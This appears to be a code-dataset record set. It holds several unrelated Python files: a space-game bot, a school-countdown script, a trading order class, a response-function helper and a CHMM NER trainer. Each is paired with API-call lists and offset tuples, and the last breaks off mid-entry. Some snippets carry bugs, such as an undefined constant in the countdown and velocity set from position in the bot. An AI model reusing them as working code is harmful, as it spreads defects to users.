                            avoid[1] += tmp[1]*predeyesight
                            avoid[2] += tmp[2]*predeyesight
                            gamestate.log("Ship " + str(ship_uid) + " is targeting at 75m/s...")
                elif prediction1 is not None:
                    time, coords = prediction1
                    time += self.step
                    laser = Laser(0)
                    laser.lifetime = 3
                    laser.owner = ship_uid
                    laser.posx = shipp.posx
                    laser.posy = shipp.posy
                    laser.velx = shipp.velx + 50*math.sin(self.toRad(shipp.ang))
                    laser.vely = shipp.posy + 50*math.cos(self.toRad(shipp.ang))
                    if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
                        if time < 1:
                            shp = self.estimateShip(s_ship, time)
                            lsr = self.estimateLaser(laser, time)
                            tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
                            avoid[0] += tmp[0]*predeyesight
                            avoid[1] += tmp[1]*predeyesight
                            avoid[2] += tmp[2]*predeyesight
                            gamestate.log("Ship " + str(ship_uid) + " is targeting at 50m/s...")
                if prediction0 is not None:
                    time, coords = prediction0
                    time += self.step
                    laser = Laser(0)
                    laser.lifetime = 3
                    laser.owner = ship_uid
                    laser.posx = shipp.posx
                    laser.posy = shipp.posy
                    laser.velx = shipp.velx + 25*math.sin(self.toRad(shipp.ang))
                    laser.vely = shipp.posy + 25*math.cos(self.toRad(shipp.ang))
                    if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
                        if time < 1:
                            shp = self.estimateShip(s_ship, time)
                            lsr = self.estimateLaser(laser, time)
                            tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
                            avoid[0] += tmp[0]*predeyesight
                            avoid[1] += tmp[1]*predeyesight
                            avoid[2] += tmp[2]*predeyesight
                            gamestate.log("Ship " + str(ship_uid) + " is targeting at 25m/s...")
            #apply rotations and final weight calculation
            peravd = 2
            out[0] += avoid[0]*peravd
            out[1] += avoid[1]*peravd
            out[2] += avoid[2]*peravd
            mx = 1
            #out = self.normalize(out)
            #mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
            #if mx != 0:
            #    mx = 1/mx
            #mx = 1
            rotmulti = 1
            #out[0] = 0
            # Rotation is realized by opposite side-thruster contributions.
            out[1] += rotation_out*rotmulti
            out[2] += -rotation_out*rotmulti
            #out_s = 0
            #out = [0, 0, 0]
            #virtual 'friction'
            '''kF = .5
            vel = [s_ship.posx-s_ship.velx, s_ship.posy-s_ship.vely]
            mvel = math.sqrt(s_ship.velx**2 + s_ship.vely**2)
            vel = self.normalize(vel)
            tmp = self.accelerateTo(s_ship, vel[0], vel[1], kF)
            out[0] += tmp[0]*(mvel/30)
            out[1] += tmp[1]*(mvel/30)
            out[2] += tmp[2]*(mvel/30)'''
            #Emergency overwrite - in case of iminent danger
            rotation_out = 0
            if rock_less <= 1:
                out_s = 1
                # NOTE(review): logs laser_less_uid in the rock branch --
                # rock_less_uid was likely intended.
                gamestate.log("Overwriting controls: rock 1s of ID " + str(laser_less_uid))
                shipp = self.estimateShip(s_ship, self.step)
                targetp = self.estimateRock(gamestate.rocks[rock_less_uid], self.step)
                prediction = self.predShoot(shipp, targetp, 25, gamestate)
                if prediction is not None:
                    time, coords = prediction
                    rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
                if rock_less <= .5:
                    # Imminent impact: replace all thrust with pure retreat.
                    gamestate.log("Overwriting controls: rock .5 of ID " + str(rock_less_uid))
                    shp = self.estimateShip(s_ship, rock_less)
                    rck = self.estimateRock(gamestate.rocks[rock_less_uid], rock_less)
                    out = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy)
                    out = self.normalize(out)
                    out = self.invert(out)
                out[1] += rotation_out*rotmulti
                out[2] += -rotation_out*rotmulti
                mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
                if mx != 0:
                    mx = 1/mx
            if laser_less <= 1.5:
                out_s = 1
                gamestate.log("Overwriting controls: laser 1s of ID " + str(laser_less_uid))
                shipp = self.estimateShip(s_ship, self.step)
                targetp = self.estimateLaser(gamestate.lasers[laser_less_uid], self.step)
                prediction = self.predShoot(shipp, targetp, 25, gamestate)
                if prediction is not None:
                    time, coords = prediction
                    rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
                if laser_less <= .5:
                    gamestate.log("Overwriting controls: laser .5 of ID " + str(laser_less_uid))
                    shp = self.estimateShip(s_ship, laser_less)
                    lsr = self.estimateLaser(gamestate.lasers[laser_less_uid], laser_less)
                    out = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy)
                    out = self.normalize(out)
                    out = self.invert(out)
                    #@out[0] = -out[0]
                out[1] += rotation_out*rotmulti
                out[2] += -rotation_out*rotmulti
                mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
                if mx != 0:
                    mx = 1/mx
            return Action(-out[0]*mx, out[1]*mx, out[2]*mx, out_s)
        # No target acquired: drift forward.
        gamestate.log(str(s_ship.vely))
        return Action(1, 0, 0, 0)
# Entry point: wrap the bot in a GameState session and connect to the server.
GameState(SeijiBot()).connect()
| [
"math.floor",
"math.sqrt",
"math.cos",
"math.atan2",
"math.sin"
] | [((1088, 1104), 'math.sqrt', 'math.sqrt', (['delta'], {}), '(delta)\n', (1097, 1104), False, 'import math\n'), ((1214, 1284), 'math.sqrt', 'math.sqrt', (['((obj1.posx - obj2.posx) ** 2 + (obj1.posy - obj2.posy) ** 2)'], {}), '((obj1.posx - obj2.posx) ** 2 + (obj1.posy - obj2.posy) ** 2)\n', (1223, 1284), False, 'import math\n'), ((1491, 1508), 'math.floor', 'math.floor', (['(n / k)'], {}), '(n / k)\n', (1501, 1508), False, 'import math\n'), ((1852, 1867), 'math.sqrt', 'math.sqrt', (['sqrl'], {}), '(sqrl)\n', (1861, 1867), False, 'import math\n'), ((15594, 15640), 'math.sqrt', 'math.sqrt', (['(s_ship.posx ** 2 + s_ship.posy ** 2)'], {}), '(s_ship.posx ** 2 + s_ship.posy ** 2)\n', (15603, 15640), False, 'import math\n'), ((1629, 1645), 'math.cos', 'math.cos', (['(-angle)'], {}), '(-angle)\n', (1637, 1645), False, 'import math\n'), ((1653, 1669), 'math.sin', 'math.sin', (['(-angle)'], {}), '(-angle)\n', (1661, 1669), False, 'import math\n'), ((1676, 1692), 'math.cos', 'math.cos', (['(-angle)'], {}), '(-angle)\n', (1684, 1692), False, 'import math\n'), ((1700, 1716), 'math.sin', 'math.sin', (['(-angle)'], {}), '(-angle)\n', (1708, 1716), False, 'import math\n'), ((6195, 6211), 'math.sqrt', 'math.sqrt', (['delta'], {}), '(delta)\n', (6204, 6211), False, 'import math\n'), ((6248, 6264), 'math.sqrt', 'math.sqrt', (['delta'], {}), '(delta)\n', (6257, 6264), False, 'import math\n'), ((10541, 10599), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (10551, 10599), False, 'import math\n'), ((10700, 10764), 'math.atan2', 'math.atan2', (['(shipp.posx - targetp.posx)', '(targetp.posy - shipp.posy)'], {}), '(shipp.posx - targetp.posx, targetp.posy - shipp.posy)\n', (10710, 10764), False, 'import math\n'), ((11218, 11265), 'math.sqrt', 'math.sqrt', (['((rock_repel_r - dist) / rock_repel_r)'], {}), '((rock_repel_r - dist) / rock_repel_r)\n', (11227, 11265), False, 'import math\n'), 
((12742, 12791), 'math.sqrt', 'math.sqrt', (['((laser_repel_r - dist) / laser_repel_r)'], {}), '((laser_repel_r - dist) / laser_repel_r)\n', (12751, 12791), False, 'import math\n'), ((22579, 22637), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (22589, 22637), False, 'import math\n'), ((23739, 23797), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (23749, 23797), False, 'import math\n'), ((15717, 15763), 'math.sqrt', 'math.sqrt', (['(s_ship.posx ** 2 + s_ship.posy ** 2)'], {}), '(s_ship.posx ** 2 + s_ship.posy ** 2)\n', (15726, 15763), False, 'import math\n'), ((9845, 9903), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (9855, 9903), False, 'import math\n'), ((10103, 10161), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (10113, 10161), False, 'import math\n'), ((10361, 10419), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (10371, 10419), False, 'import math\n'), ((11884, 11933), 'math.sqrt', 'math.sqrt', (['((rock_repel_t - toc[0]) / rock_repel_t)'], {}), '((rock_repel_t - toc[0]) / rock_repel_t)\n', (11893, 11933), False, 'import math\n'), ((18214, 18272), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (18224, 18272), False, 'import math\n'), ((18538, 18587), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - time) / laser_repel_t)'], {}), '((laser_repel_t - time) / laser_repel_t)\n', (18547, 18587), False, 'import math\n'), ((20484, 20542), 'math.atan2', 'math.atan2', 
(['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (20494, 20542), False, 'import math\n'), ((20808, 20857), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - time) / laser_repel_t)'], {}), '((laser_repel_t - time) / laser_repel_t)\n', (20817, 20857), False, 'import math\n'), ((14866, 14917), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - toc[0]) / laser_repel_t)'], {}), '((laser_repel_t - toc[0]) / laser_repel_t)\n', (14875, 14917), False, 'import math\n'), ((19350, 19408), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (19360, 19408), False, 'import math\n'), ((19674, 19723), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - time) / laser_repel_t)'], {}), '((laser_repel_t - time) / laser_repel_t)\n', (19683, 19723), False, 'import math\n'), ((13806, 13864), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (13816, 13864), False, 'import math\n'), ((14202, 14260), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (14212, 14260), False, 'import math\n'), ((14599, 14657), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (14609, 14657), False, 'import math\n')] |
from datetime import date, datetime, timedelta
import time
START_DATE = date(2021, 5, 25)
duration = timedelta(days=100)
def countdown():
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print()
print("\tTime until school is out for summer 2021:", end="\n\n")
while event_delta.seconds > 0:
hours, remaining_delta = divmod(event_delta.seconds, 3600)
mins, secs = divmod(remaining_delta, 60)
timer = f"\t{event_delta.days:02d} days {hours:02d} hours {mins:02d} minutes {secs:02d} seconds"
print(timer, end="\r")
time.sleep(1)
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print("School's out for summer!")
| [
"datetime.datetime.now",
"datetime.timedelta",
"datetime.date",
"time.sleep"
] | [((73, 90), 'datetime.date', 'date', (['(2021)', '(5)', '(25)'], {}), '(2021, 5, 25)\n', (77, 90), False, 'from datetime import date, datetime, timedelta\n'), ((102, 121), 'datetime.timedelta', 'timedelta', ([], {'days': '(100)'}), '(days=100)\n', (111, 121), False, 'from datetime import date, datetime, timedelta\n'), ((180, 194), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (192, 194), False, 'from datetime import date, datetime, timedelta\n'), ((571, 584), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (581, 584), False, 'import time\n'), ((628, 642), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (640, 642), False, 'from datetime import date, datetime, timedelta\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'HaiFeng'
__mtime__ = '2016/8/16'
"""
import time
from py_at.EnumDefine import *
########################################################################
class OrderItem(object):
"""策略信号"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.Instrument = ''
self.DateTime = time.strftime('%Y%m%d %H:%Mm:%S', time.localtime(time.time()))
self.Direction = Direction.Buy
self.Offset = Offset.Open
self.Price = 0.0
self.Volume = 0
self.Remark = ''
self.RelationOpenOrders = []
#策略相关
self.AvgEntryPriceShort = 0.0
self.AvgEntryPriceLong = 0.0
self.PositionLong = 0
self.PositionShort = 0
self.EntryDateLong = ''
self.EntryPriceLong = 0.0
self.ExitDateShort = ''
self.ExitPriceShort = 0.0
self.EntryDateShort = ''
self.EntryPriceShort = 0.0
self.ExitDateLong = ''
self.ExitPriceLong = 0.0
self.LastEntryDateShort = ''
self.LastEntryPriceShort = 0.0
self.LastEntryDateLong = ''
self.LastEntryPriceLong = 0.0
self.IndexEntryLong = -1
self.IndexEntryShort = -1
self.IndexLastEntryLong = -1
self.IndexLastEntryShort = -1
self.IndexExitLong = -1
self.IndexExitShort = -1
#----------------------------------------------------------------------
def __str__(self):
""""""
return '{self.Instrument}, {self.DateTime}, {self.Direction}, {self.Offset}, {self.Price}, {self.Volume}, {self.Remark}'.format(self = self) | [
"time.time"
] | [((477, 488), 'time.time', 'time.time', ([], {}), '()\n', (486, 488), False, 'import time\n')] |
from __future__ import print_function, division
import numpy as np
from numpy import identity, dot, zeros, zeros_like
def rf_den_via_rf0(self, rf0, v):
""" Whole matrix of the interacting response via non-interacting response and interaction"""
rf = zeros_like(rf0)
I = identity(rf0.shape[1])
for ir,r in enumerate(rf0):
rf[ir] = dot(np.linalg.inv(I-dot(r,v)), r)
return rf
def rf_den(self, ww):
""" Full matrix interacting response from NAO GW class"""
rf0 = self.rf0(ww)
return rf_den_via_rf0(self, rf0, self.kernel_sq)
| [
"numpy.identity",
"numpy.dot",
"numpy.zeros_like"
] | [((255, 270), 'numpy.zeros_like', 'zeros_like', (['rf0'], {}), '(rf0)\n', (265, 270), False, 'from numpy import identity, dot, zeros, zeros_like\n'), ((278, 300), 'numpy.identity', 'identity', (['rf0.shape[1]'], {}), '(rf0.shape[1])\n', (286, 300), False, 'from numpy import identity, dot, zeros, zeros_like\n'), ((364, 373), 'numpy.dot', 'dot', (['r', 'v'], {}), '(r, v)\n', (367, 373), False, 'from numpy import identity, dot, zeros, zeros_like\n')] |
import os
import logging
import numpy as np
from typing import Optional
import torch
from torch.utils.data import DataLoader
from ..eval import Metric
from .dataset import CHMMBaseDataset
from .dataset import collate_fn as default_collate_fn
logger = logging.getLogger(__name__)
OUT_RECALL = 0.9
OUT_PRECISION = 0.8
class CHMMBaseTrainer:
def __init__(self,
config,
collate_fn=None,
training_dataset=None,
valid_dataset=None,
test_dataset=None,
pretrain_optimizer=None,
optimizer=None):
self._model = None
self._config = config
self._training_dataset = training_dataset
self._valid_dataset = valid_dataset
self._test_dataset = test_dataset
self._collate_fn = collate_fn
self._pretrain_optimizer = pretrain_optimizer
self._optimizer = optimizer
self._init_state_prior = None
self._init_trans_mat = None
self._init_emiss_mat = None
@property
def config(self):
return self._config
@config.setter
def config(self, x):
logger.warning("Updating DirCHMMTrainer.config")
self._config = x
@property
def model(self):
return self._model
def initialize_trainer(self):
"""
Initialize necessary components for training
Note: Better not change the order
Returns
-------
the initialized trainer
"""
self.initialize_matrices()
self.initialize_model()
self.initialize_optimizers()
return self
def initialize_model(self):
raise NotImplementedError
def initialize_matrices(self):
"""
Initialize <HMM> transition and emission matrices
Returns
-------
self
"""
assert self._training_dataset and self._valid_dataset
# inject prior knowledge about transition and emission
self._init_state_prior = torch.zeros(self._config.d_hidden, device=self._config.device) + 1e-2
self._init_state_prior[0] += 1 - self._init_state_prior.sum()
intg_obs = list(map(np.array, self._training_dataset.obs + self._valid_dataset.obs))
# construct/load initial transition matrix
dataset_dir = os.path.split(self._config.train_path)[0]
transmat_path = os.path.join(dataset_dir, "init_transmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(transmat_path):
logger.info("Loading initial transition matrix from disk")
self._init_trans_mat = torch.load(transmat_path)
# if the loaded transmat does not have the proper shape, re-calculate it.
s0_transmat, s1_transmat = self._init_trans_mat.shape
if not (s0_transmat == s1_transmat == self.config.d_obs):
self._init_trans_mat = None
if self._init_trans_mat is None:
self._init_trans_mat = torch.tensor(initialise_transmat(
observations=intg_obs, label_set=self._config.bio_label_types
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial transition matrix")
torch.save(self._init_trans_mat, transmat_path)
# construct/load initial emission matrix
emissmat_path = os.path.join(dataset_dir, "init_emissmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(emissmat_path):
logger.info("Loading initial emission matrix from disk")
self._init_emiss_mat = torch.load(emissmat_path)
# if the loaded emissmat does not have the proper shape, re-calculate it.
s0_emissmat, s1_emissmat, s2_emissmat = self._init_emiss_mat.shape
if not (s0_emissmat == self.config.n_src) and (s1_emissmat == s2_emissmat == self.config.d_obs):
self._init_emiss_mat = None
if self._init_emiss_mat is None:
self._init_emiss_mat = torch.tensor(initialise_emissions(
observations=intg_obs, label_set=self._config.bio_label_types,
sources=self._config.sources, src_priors=self._config.src_priors
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial emission matrix")
torch.save(self._init_emiss_mat, emissmat_path)
return self
def initialize_optimizers(self, optimizer=None, pretrain_optimizer=None):
self._optimizer = self.get_optimizer() if optimizer is None else optimizer
self._pretrain_optimizer = self.get_pretrain_optimizer() if pretrain_optimizer is None else pretrain_optimizer
def get_dataloader(self, dataset, shuffle=False):
if dataset is not None:
dataloader = DataLoader(
dataset=dataset,
batch_size=self._config.lm_batch_size,
collate_fn=self._collate_fn if self._collate_fn is not None else default_collate_fn,
shuffle=shuffle,
drop_last=False
)
return dataloader
else:
logger.error('Dataset is not defined')
raise ValueError("Dataset is not defined!")
def pretrain_step(self, data_loader, optimizer, trans_, emiss_):
raise NotImplementedError
def training_step(self, data_loader, optimizer):
raise NotImplementedError
def train(self):
raise NotImplementedError
def valid(self) -> Metric:
self._model.to(self._config.device)
valid_metrics = self.evaluate(self._valid_dataset)
logger.info("Validation results:")
for k, v in valid_metrics.items():
logger.info(f" {k}: {v:.4f}")
return valid_metrics
def test(self) -> Metric:
self._model.to(self._config.device)
test_metrics = self.evaluate(self._test_dataset)
logger.info("Test results:")
for k, v in test_metrics.items():
logger.info(f" {k}: {v:.4f}")
return test_metrics
def evaluate(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def predict(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def get_pretrain_optimizer(self):
raise NotImplementedError
def get_optimizer(self):
# ----- initialize optimizer -----
raise NotImplementedError
def save(self,
output_dir: Optional[str] = None,
save_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Save model parameters as well as trainer parameters
Parameters
----------
output_dir: model directory
save_optimizer: whether to save optimizer
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
None
"""
output_dir = output_dir if output_dir is not None else self._config.output_dir
logger.info(f"Saving model to {output_dir}")
model_state_dict = self._model.state_dict()
torch.save(model_state_dict, os.path.join(output_dir, f'{model_name}.bin'))
self._config.save(output_dir)
if save_optimizer:
logger.info("Saving optimizer and scheduler")
torch.save(self._optimizer.state_dict(),
os.path.join(output_dir, f"{optimizer_name}.bin"))
torch.save(self._pretrain_optimizer.state_dict(),
os.path.join(output_dir, f"{pretrain_optimizer_name}.bin"))
return None
def load(self,
input_dir: Optional[str] = None,
load_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Load model parameters.
Parameters
----------
input_dir: model directory
load_optimizer: whether load other trainer parameters
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
self
"""
input_dir = input_dir if input_dir is not None else self._config.output_dir
if self._model is not None:
logger.warning(f"The original model {type(self._model)} in {type(self)} is not None. "
f"It will be overwritten by the loaded model!")
logger.info(f"Loading model from {input_dir}")
self.initialize_model()
self._model.load_state_dict(torch.load(os.path.join(input_dir, f'{model_name}.bin')))
self._model.to(self.config.device)
if load_optimizer:
logger.info("Loading optimizer and scheduler")
if self._optimizer is None:
self.initialize_optimizers()
if os.path.isfile(os.path.join(input_dir, f"{optimizer_name}.bin")):
self._optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{optimizer_name}.bin"), map_location=self.config.device)
)
else:
logger.warning("Optimizer file does not exist!")
if os.path.isfile(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin")):
self._pretrain_optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin"))
)
else:
logger.warning("Pretrain optimizer file does not exist!")
return self
def save_results(self,
output_dir: str,
valid_results: Optional[Metric] = None,
file_name: Optional[str] = 'results',
disable_final_valid: Optional[bool] = False,
disable_test: Optional[bool] = False,
disable_inter_results: Optional[bool] = False) -> None:
"""
Save training (validation) results
Parameters
----------
output_dir: output directory, should be a folder
valid_results: validation results during the training process
file_name: file name
disable_final_valid: disable final validation process (getting validation results of the trained model)
disable_test: disable test process
disable_inter_results: do not save inter-results
Returns
-------
None
"""
if not disable_final_valid:
logger.info("Getting final validation metrics")
valid_metrics = self.valid()
else:
valid_metrics = None
if not disable_test:
logger.info("Getting test metrics.")
test_metrics = self.test()
else:
test_metrics = None
# write validation and test results
result_file = os.path.join(output_dir, f'{file_name}.txt')
logger.info(f"Writing results to {result_file}")
self.write_result(file_path=result_file,
valid_results=valid_results,
final_valid_metrics=valid_metrics,
test_metrics=test_metrics)
if not disable_inter_results:
# save validation inter results
logger.info(f"Saving inter results")
inter_result_file = os.path.join(output_dir, f'{file_name}-inter.pt')
torch.save(valid_results.__dict__, inter_result_file)
return None
@staticmethod
def write_result(file_path: str,
valid_results: Optional[Metric] = None,
final_valid_metrics: Optional[Metric] = None,
test_metrics: Optional[Metric] = None) -> None:
"""
Support functions for saving training results
Parameters
----------
file_path: where to save results
valid_results: validation results during the training process
final_valid_metrics: validation results of the trained model
test_metrics
Returns
-------
"""
with open(file_path, 'w') as f:
if valid_results is not None:
for i in range(len(valid_results)):
f.write(f"[Epoch {i + 1}]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {valid_results[k][i]:.4f}")
f.write("\n")
if final_valid_metrics is not None:
f.write(f"[Best Validation]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {final_valid_metrics[k]:.4f}")
f.write("\n")
if test_metrics is not None:
f.write(f"[Test]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {test_metrics[k]:.4f}")
f.write("\n")
return None
def initialise_startprob(observations,
label_set,
src_idx=None):
"""
calculate initial hidden states (not used in our setup since our sequences all begin from
[CLS], which corresponds to hidden state "O".
:param src_idx: source index
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: probabilities for the initial hidden states
"""
n_src = observations[0].shape[1]
logger.info("Constructing start distribution prior...")
init_counts = np.zeros((len(label_set),))
if src_idx is not None:
for obs in observations:
init_counts[obs[0, src_idx].argmax()] += 1
else:
for obs in observations:
for z in range(n_src):
init_counts[obs[0, z].argmax()] += 1
for i, label in enumerate(label_set):
if i == 0 or label.startswith("B-"):
init_counts[i] += 1
startprob_prior = init_counts + 1
startprob_ = np.random.dirichlet(init_counts + 1E-10)
return startprob_, startprob_prior
# TODO: try to use a more reliable source to start the transition and emission
def initialise_transmat(observations,
label_set,
src_idx=None):
"""
initialize transition matrix
:param src_idx: the index of the source of which the transition statistics is computed.
If None, use all sources
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: initial transition matrix and transition counts
"""
logger.info("Constructing transition matrix prior...")
n_src = observations[0].shape[1]
trans_counts = np.zeros((len(label_set), len(label_set)))
if src_idx is not None:
for obs in observations:
for k in range(0, len(obs) - 1):
trans_counts[obs[k, src_idx].argmax(), obs[k + 1, src_idx].argmax()] += 1
else:
for obs in observations:
for k in range(0, len(obs) - 1):
for z in range(n_src):
trans_counts[obs[k, z].argmax(), obs[k + 1, z].argmax()] += 1
# update transition matrix with prior knowledge
for i, label in enumerate(label_set):
if label.startswith("B-") or label.startswith("I-"):
trans_counts[i, label_set.index("I-" + label[2:])] += 1
elif i == 0 or label.startswith("I-"):
for j, label2 in enumerate(label_set):
if j == 0 or label2.startswith("B-"):
trans_counts[i, j] += 1
transmat_prior = trans_counts + 1
# initialize transition matrix with dirichlet distribution
transmat_ = np.vstack([np.random.dirichlet(trans_counts2 + 1E-10)
for trans_counts2 in trans_counts])
return transmat_, transmat_prior
def initialise_emissions(observations,
label_set,
sources,
src_priors,
strength=1000):
"""
initialize emission matrices
:param sources: source names
:param src_priors: source priors
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:param strength: Don't know what this is for
:return: initial emission matrices and emission counts?
"""
logger.info("Constructing emission probabilities...")
obs_counts = np.zeros((len(sources), len(label_set)), dtype=np.float64)
# extract the total number of observations for each prior
for obs in observations:
obs_counts += obs.sum(axis=0)
for source_index, source in enumerate(sources):
# increase p(O)
obs_counts[source_index, 0] += 1
# increase the "reasonable" observations
for pos_index, pos_label in enumerate(label_set[1:]):
if pos_label[2:] in src_priors[source]:
obs_counts[source_index, pos_index] += 1
# construct probability distribution from counts
obs_probs = obs_counts / (obs_counts.sum(axis=1, keepdims=True) + 1E-3)
# initialize emission matrix
matrix = np.zeros((len(sources), len(label_set), len(label_set)))
for source_index, source in enumerate(sources):
for pos_index, pos_label in enumerate(label_set):
# Simple case: set P(O=x|Y=x) to be the recall
recall = 0
if pos_index == 0:
recall = OUT_RECALL
elif pos_label[2:] in src_priors[source]:
_, recall = src_priors[source][pos_label[2:]]
matrix[source_index, pos_index, pos_index] = recall
for pos_index2, pos_label2 in enumerate(label_set):
if pos_index2 == pos_index:
continue
elif pos_index2 == 0:
precision = OUT_PRECISION
elif pos_label2[2:] in src_priors[source]:
precision, _ = src_priors[source][pos_label2[2:]]
else:
precision = 1.0
# Otherwise, we set the probability to be inversely proportional to the precision
# and the (unconditional) probability of the observation
error_prob = (1 - recall) * (1 - precision) * (0.001 + obs_probs[source_index, pos_index2])
# We increase the probability for boundary errors (i.e. I-ORG -> B-ORG)
if pos_index > 0 and pos_index2 > 0 and pos_label[2:] == pos_label2[2:]:
error_prob *= 5
# We increase the probability for errors with same boundary (i.e. I-ORG -> I-GPE)
if pos_index > 0 and pos_index2 > 0 and pos_label[0] == pos_label2[0]:
error_prob *= 2
matrix[source_index, pos_index, pos_index2] = error_prob
error_indices = [i for i in range(len(label_set)) if i != pos_index]
error_sum = matrix[source_index, pos_index, error_indices].sum()
matrix[source_index, pos_index, error_indices] /= (error_sum / (1 - recall) + 1E-5)
emission_priors = matrix * strength
emission_probs = matrix
return emission_probs, emission_priors
| [
"logging.getLogger",
"torch.load",
"os.path.join",
"os.path.split",
"os.path.isfile",
"numpy.random.dirichlet",
"torch.save",
"torch.utils.data.DataLoader",
"torch.zeros"
] | [((254, 281), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (271, 281), False, 'import logging\n'), ((14610, 14650), 'numpy.random.dirichlet', 'np.random.dirichlet', (['(init_counts + 1e-10)'], {}), '(init_counts + 1e-10)\n', (14629, 14650), True, 'import numpy as np\n'), ((2409, 2454), 'os.path.join', 'os.path.join', (['dataset_dir', '"""init_transmat.pt"""'], {}), "(dataset_dir, 'init_transmat.pt')\n", (2421, 2454), False, 'import os\n'), ((3473, 3518), 'os.path.join', 'os.path.join', (['dataset_dir', '"""init_emissmat.pt"""'], {}), "(dataset_dir, 'init_emissmat.pt')\n", (3485, 3518), False, 'import os\n'), ((11491, 11535), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{file_name}.txt"""'], {}), "(output_dir, f'{file_name}.txt')\n", (11503, 11535), False, 'import os\n'), ((2035, 2097), 'torch.zeros', 'torch.zeros', (['self._config.d_hidden'], {'device': 'self._config.device'}), '(self._config.d_hidden, device=self._config.device)\n', (2046, 2097), False, 'import torch\n'), ((2343, 2381), 'os.path.split', 'os.path.split', (['self._config.train_path'], {}), '(self._config.train_path)\n', (2356, 2381), False, 'import os\n'), ((2528, 2557), 'os.path.isfile', 'os.path.isfile', (['transmat_path'], {}), '(transmat_path)\n', (2542, 2557), False, 'import os\n'), ((3592, 3621), 